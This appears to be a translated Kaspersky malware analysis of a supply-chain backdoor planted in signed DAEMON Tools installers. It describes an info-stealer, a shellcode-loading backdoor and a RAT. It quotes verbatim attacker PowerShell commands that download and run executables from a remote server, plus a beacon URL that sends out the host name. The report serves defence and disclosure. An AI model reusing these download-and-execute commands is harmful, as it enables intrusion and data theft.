卡巴斯基技术分析原文: https://securelist.com/tr/daemon-tools-backdoor/119654/
更新于 2026 年 5 月 6 日:披露后,供应商承认了该问题,并发布了旨在解决该问题的新软件版本。更新后的版本 12.6.0.2445 不再包含本文所述的恶意行为。
2026 年 5 月 6 日更新:使用 Kaspersky Anti Targeted Attack (KATA) 的 NDR 模块,增加了对网络流量中恶意活动的检测。
更新 2026 年 5 月 5 日:添加了 KEDR 专家提供的检测规则和示例,并使用我们的卡巴斯基托管检测和响应服务验证了恶意活动的检测。
发生了什么?
2026年5月初,我们发现用于挂载磁盘镜像的DAEMON Tools软件安装程序已被植入恶意载荷。这些安装程序从DAEMON Tools的官方网站分发,并使用DAEMON Tools开发者的数字证书进行签名。我们的分析显示,这些软件安装程序自2026年4月8日起被植入木马。具体而言,我们发现DAEMON Tools版本从12.5.0.2421到12.5.0.2434均已受到感染。在观察到的恶意植入文件中,我们发现了一些迹象,表明此次攻击背后的攻击者可能使用中文。我们已联系DAEMON Tools的开发公司AVB Disc Soft,以便采取进一步措施来应对此次攻击的影响。
从四月初开始,我们的遥测数据中观察到数千起涉及 DAEMON Tools 的感染尝试,影响范围遍及 100 多个国家/地区的个人和组织。然而,在所有受感染的机器中,我们仅观察到十几台机器部署了后续阶段的有效载荷。这些接收后续有效载荷的机器属于零售、科研、政府和制造机构——这表明此次供应链攻击具有针对性。
卡巴斯基解决方案可保护其用户免受通过 DAEMON Tools 供应链攻击部署的恶意载荷的侵害。
特洛伊木马化的二进制文件
我们的分析显示,对于 DAEMON Tools 版本 12.5.0.2421 至 12.5.0.2434,攻击者已成功入侵软件安装包中的以下二进制文件:
- DTHelper.exe
- DiscSoftBusServiceLite.exe
- DTShellHlp.exe
这些文件位于 DAEMON Tools 的安装目录中,例如 /etc/ DAEMON Tools C:\Program Files\DAEMON Tools Lite 。值得注意的是,这些文件由 DAEMON Tools 的开发商 AVB Disc Soft 进行了数字签名。
每当这些二进制文件之一启动时(通常在机器启动时),一个后门程序就会被激活。该后门程序被植入到负责初始化 CRT 环境的启动代码中。后门程序在一个专用线程中运行,用于向以下 URL 发送 GET 请求:
https://env-check.daemontools[.]cc/2032716822411?s=<full computer name>
URL。用于通信的服务器是恶意服务器,其地址旨在抢注daemon-tools[.]cc 用于下载 DAEMON Tools 的合法域名。值得注意的是,根据 WHOIS 信息,该恶意服务器的域名注册于 3 月 27 日,大约在供应链攻击开始前一周。
服务器收到请求后,可能会返回一个 shell 命令,该命令将通过 cmd.exe 进程执行。我们观察到该 shell 命令具有以下模板:
cmd.exe /c powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107[.]76/’,‘C:\Windows\Temp<filename>.exe’)”&& %TEMP%<filename> &&del %TEMP%<filename>.exe"
从模板可以看出,这些 shell 命令用于下载和启动可执行有效载荷。我们已经见过多种类型的有效载荷,下面将进行描述。
信息收集员
我们观察到攻击者部署的第一个有效载荷是信息收集器。它是通过以下命令部署的:
cmd.exe /c powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107.76/env_check_script’,'C:\Windows\Temp\envchk.exe’)”&&C:\Windows\Temp\envchk.exe http://38.180.107.76/09505aca4f538bd&&del %TEMP%\envchk.exe
envchk.exe 文件(SHA1: 2d4eb55b01f59c62c6de9aacba9b47267d398fe4 )是一个用于收集扩展系统信息的 .NET 可执行文件。值得注意的是,其代码中包含中文字符串。虽然这可能暗示此次攻击是由讲中文的攻击者所为,但我们目前并未将 DAEMON Tools 的入侵归咎于任何特定攻击者。
信息收集器代码的屏幕截图,其中包含中文字符串
信息收集器收集的数据包括:
- MAC 地址(第一个非零值);
- 主机名;
- DNS域名;
- 正在运行的进程列表,用分号分隔;
- 已安装软件列表,以分号分隔;
- 系统区域设置。
此信息将发送到信息收集器命令行参数中指定的 C2 服务器。从上面的命令可以看出,服务器的地址是:
http://38.180.107[.]76/09505aca4f538bd
数据通过以下 POST 请求体传递:
a=&b=&c=&d=&e=&f=
极简主义后门
虽然我们观察到信息收集器试图部署在大量受感染的机器上,但我们也注意到攻击者试图向极少数机器(大约十几台)投放另一种有效载荷。基于此,我们高度确信信息收集器用于分析受感染机器,而分析结果将被用于有针对性地部署其他有效载荷。
我们观察到的此类有效载荷之一是极简后门。我们观察到它是通过以下命令部署的:
cmd.exe /c powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107.76/b3593ac2edb34f4d4d’,'C:\Windows\Temp\cdg.exe’)”&&powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107.76/368b1365bd9176b359’,'%TEMP%\cdg.tmp’)”&&%TEMP%\cdg.exe schedsvc.dll %TEMP%\cdg.tmp first_match&&del %TEMP%\cdg.exe&&del %TEMP%\cdg.tmp"
可以看出,该命令用于下载两个文件,cdg.exe 和cdg.tmp 。cdg.exe 进一步启动的文件是一个 shellcode 加载器,它打开cdg.tmp 文件,使用RC4 (使用最后一个参数中指定的密钥,first_match 在上面的例子中是)对其进行解密,并将其作为 shellcode 运行。
cdg.exe shellcode 加载器用法
这段 shellcode 代表后门主体。后门本身会向以下 URL 发送 POST 请求心跳:
http://38.180.107[.]76/79437f5edda13f9c066/version/check
URL。它的功能包括下载文件、运行 shell 命令和在内存中执行 shellcode 有效载荷。
这是一段反编译后的极简后门代码片段,用于执行命令。
奇怪的是,在某些情况下,我们观察到这个极简后门程序会与其他命令一起部署,例如以下命令:
cmd.exe /c powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107[.]76/407fbb423143f99fe0’,‘C:\ProgramData\Microsoft\mcrypto.chiper’)”&&powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107[.]76/07fbb423143f99fe07’,‘$appdata\Microsoft\mcrypto.dat’)”&&start rundll32.exe $appdata\Microsoft\mcrypto.chiper, mcrypto_clean
“cmd.exe /c powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107[.]76/407fbb423143f99fe0’,‘C:\Windows\Temp\crypto.dll’)”&&powershell -NoProfile -Command “$wc=New-Object System.Net.WebClient;$wc.DownloadFile(‘http://38.180.107[.]76/07fbb423143f99fe07’,‘$appdata\Microsoft\mcrypto.dat’)”&&start rundll32.exe %TEMP%\rypto.dll, mcrypto_clean”
值得注意的是,这些命令序列中存在拼写错误。在第一个命令序列中,“cipher”被拼写成了“chiper”,而在第二个命令序列中,“crypto.dll”文件名中的字母“c”被省略了。从命令中可以看出,由于这个拼写错误,后门程序无法启动——这很可能表明该后门程序是在实际操作过程中部署的。
QUIC RAT
在分析了攻击者如何尝试利用这个极简后门后,我们发现它被用于部署一个更为复杂的植入程序,我们将其命名为 QUIC RAT。虽然我们观察到极简后门后门被部署到十几台机器上,但我们确定 QUIC RAT 仅被用于攻击一个组织,即位于俄罗斯的一所教育机构。该 RAT 使用 C++ 编写,并采用控制流扁平化技术进行混淆,静态链接了 WolfSSL 库。此外,它还msquic.dll 在其.data 代码段中包含了合法库的主体部分。
该后门支持多种C2通信协议,包括HTTP、UDP、TCP、WSS、QUIC、DNS和HTTP/3。虽然分析仍在进行中,但我们发现QUIC RAT能够将有效载荷注入notepad.exe和conhost.exe进程。
受害者学
自4月8日首个被植入木马的DAEMON Tools版本部署以来,我们观察到数千次通过受感染二进制文件进行的恶意载荷部署尝试。值得注意的是,这是一个相当大的数字,表明此次攻击具有广泛的范围。
我们观察到这些部署发生在 100 多个国家和地区的个人和组织的机器上,其中大多数受害者位于俄罗斯、巴西、土耳其、西班牙、德国、法国、意大利和中国。
分析显示,10%的受影响系统属于企业和组织。攻击者试图仅使用信息收集有效载荷感染大多数受影响的机器。然而,另一种更为复杂的后门有效载荷仅在位于俄罗斯、白俄罗斯和泰国的十几台政府、科研、制造和零售机构的机器上被发现。这种将后门部署到一小部分受感染机器的方式清楚地表明,攻击者意图以有针对性的方式进行感染。然而,他们的意图——是网络间谍活动还是“大型猎杀” ——目前尚不清楚。
建议和结论
基于我们长期分析供应链攻击的经验,我们可以得出结论:攻击者以极其复杂的方式策划了此次 DAEMON Tools 入侵事件。例如,此次攻击的检测耗时约一个月,与我们 2023 年与网络安全社区共同研究的3CX供应链攻击事件的时间相当。鉴于此次攻击的高度复杂性,各组织必须仔细检查安装了 DAEMON Tools 的机器,以发现 4 月 8 日或之后发生的异常网络安全活动。
2026年至今仅过去了四个月,在这短短的时间里,我们观察到供应链攻击的报告数量不断增加。1月份我们调查了eScan , 2月份调查了Notepad++ ,4月份调查了CPU-Z,现在5月份又调查了DAEMON Tools。鉴于供应链攻击的激增,企业在选择安装软件时应格外谨慎。同时,这也表明,由于应用广泛且受信任,这些应用也可能成为攻击者的重要攻击途径,因为它们具有广泛的潜在影响。企业在制定网络安全战略时应牢记这一点,以确保“零信任”战略的有效实施。
卡巴斯基在2026年对大规模供应链安全事件的分析和发现做出了重大贡献,并通过Securelist上的威胁响应报告与网络安全社区分享了技术发现。卡巴斯基解决方案能够及时检测并防御此类攻击。